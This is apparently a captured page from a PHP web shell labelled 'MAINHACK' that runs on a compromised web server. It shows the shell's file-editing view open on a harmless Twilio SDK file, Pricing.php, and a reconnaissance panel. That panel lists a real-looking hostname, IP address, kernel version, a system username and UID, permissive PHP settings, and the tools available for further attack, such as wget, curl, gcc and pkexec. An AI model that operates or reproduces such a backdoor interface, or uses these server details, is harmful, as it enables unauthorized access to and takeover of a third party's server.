[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Pricing.php
<?php namespace Twilio\Rest; use Twilio\Rest\Pricing\V1; use Twilio\Rest\Pricing\V2; class Pricing extends PricingBase { /** * @deprecated Use v1->messaging instead. */ protected function getMessaging(): \Twilio\Rest\Pricing\V1\MessagingList { echo "messaging is deprecated. Use v1->messaging instead."; return $this->v1->messaging; } /** * @deprecated Use v1->phoneNumbers instead. */ protected function getPhoneNumbers(): \Twilio\Rest\Pricing\V1\PhoneNumberList { echo "phoneNumbers is deprecated. Use v1->phoneNumbers instead."; return $this->v1->phoneNumbers; } /** * @deprecated Use v2->voice instead. */ protected function getVoice(): \Twilio\Rest\Pricing\V2\VoiceList { echo "voice is deprecated. Use v2->voice instead."; return $this->v2->voice; } /** * @deprecated Use v2->countries instead. */ protected function getCountries(): \Twilio\Rest\Pricing\V2\CountryList { echo "countries is deprecated. Use v2->countries instead."; return $this->v2->countries; } /** * @deprecated Use v2->countries(\$isoCountry) instead. * @param string $isoCountry The ISO country code of the pricing information to * fetch */ protected function contextCountries(string $isoCountry): \Twilio\Rest\Pricing\V2\CountryContext { echo "countries(\$isoCountry) is deprecated. Use v2->countries(\$isoCountry) instead."; return $this->v2->countries($isoCountry); } /** * @deprecated Use v2->numbers instead. */ protected function getNumbers(): \Twilio\Rest\Pricing\V2\NumberList { echo "numbers is deprecated. Use v2->numbers instead."; return $this->v2->numbers; } /** * @deprecated Use v2->numbers(\$destinationNumber) instead. * @param string $destinationNumber The destination number for which to fetch * pricing information */ protected function contextNumbers(string $destinationNumber): \Twilio\Rest\Pricing\V2\NumberContext { echo "numbers(\$destinationNumber) is deprecated. Use v2->numbers(\$destinationNumber) instead."; return $this->v2->numbers($destinationNumber); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.43 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002